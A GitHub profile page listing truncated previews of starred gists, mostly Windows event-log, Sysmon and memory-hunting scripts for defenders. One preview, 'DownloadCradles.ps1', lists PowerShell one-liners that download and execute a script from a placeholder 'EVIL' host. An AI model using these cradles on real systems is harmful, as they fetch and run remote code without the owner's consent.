Skip to content

Instantly share code, notes, and snippets.

View fryguy04's full-sized avatar

Fred Frey fryguy04

13 followers · 15 following
View GitHub Profile
@infosec-intern
infosec-intern / Evtx-to-JSON.ps1
Created December 9, 2017 22:13
Convert a Windows event log record into a JSON document
# LogName can be any available event log
# or it can be replaced with "-Path" and a file path
# The resulting JSON can then be POSTed to a webserver of your choice
Get-WinEvent -LogName "Security" -MaxEvents 1 | ConvertTo-Json
@psrdrgz
psrdrgz / SysmonCheck.ps1
Created November 21, 2017 01:44
PowerShell functions for parsing Sysmon event logs
using namespace System.Management.Automation
function Search-SysmonCommandline
{
[CmdletBinding(DefaultParameterSetName='InProcess')]
Param(
[Parameter(Mandatory = $True)]
[string[]]$CommandLine,
[Parameter(Mandatory = $False)]
@truekonrads
truekonrads / evtx_to_json.py
Created July 20, 2017 19:59
Convert evtx to json
#!/usr/bin/env python
# Convert evtx to json
import Evtx.Evtx as evtx
import sys
import json
def recursive_dict(element):
# https://stackoverflow.com/questions/42925074/python-lxml-etree-element-to-json-or-dict
t = element.tag
@HarmJ0y
HarmJ0y / Get-NonstandardService.ps1
Created June 7, 2017 01:11
Get-NonstandardService
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
@pkerpedjiev
pkerpedjiev / .d3v4-selectable-force-directed-graph
Last active March 2, 2022 11:10
D3v4 Selectable, Draggable, Zoomable Force Directed Graph
.
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 14, 2024 23:56
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@RamblingCookieMonster
RamblingCookieMonster / Get-WinEventData and Sysmon.ps1
Last active October 29, 2022 14:28
Extract detailed data from Sysmon event logs
# Download and dot source Get-WinEventData
# https://gallery.technet.microsoft.com/scriptcenter/Get-WinEventData-Extract-344ad840
. "\\path\to\Get-WinEventData.ps1"
# Download and Set up Sysmon as desired
# http://technet.microsoft.com/en-us/sysinternals/dn798348
# http://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon
#Use Get-WinEvent and Get-WinEventData to obtain events and extract XML data from them - let's see all the properties behind one!
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=3} |
@andrewschoen
andrewschoen / S3 bucket sync
Created February 3, 2012 21:22
Python script to sync an S3 bucket to the local file system
# -*- coding: utf-8 -*-
import os
import StringIO
import hashlib
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
except ImportError:
raise ImproperlyConfigured, "Could not load Boto's S3 bindings."